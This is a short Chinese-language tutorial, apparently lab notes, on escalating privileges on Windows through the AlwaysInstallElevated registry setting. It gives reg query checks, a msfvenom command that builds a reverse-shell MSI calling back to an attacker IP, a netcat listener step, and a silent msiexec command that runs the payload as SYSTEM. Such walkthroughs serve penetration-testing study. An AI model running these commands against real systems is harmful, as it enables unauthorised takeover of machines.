AlwaysInstallElevated是注册表的一个键值,当其值为1时候,普通用户可以system权限安装MSI文件
实操
攻击机生成shell开启http访问,利用curl在目标机下载
攻击机开启监听并完成反弹
关于alwaysinstallelevated在注册表的位置如下只有值为1才代表具有系统权限:
reg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated
reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated
这里可以用reg query对alwaysinstallelevated在注册表的值查询了下都为1
满足基本条件以后我们可以用msfvenom制作个.msi 恶意软件
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.88.2 LPORT=6666 -f msi -o reverse.msi
新开一个nc监听,用刚才传文件的方法传过去,或者是MSF直接用upload命令传文件过去。传完以后使用msiexec 命令执行
msiexec /quiet /qn /i C:\Users\user\Desktop\reverse.msi
然后就会获得一个更高权限的shell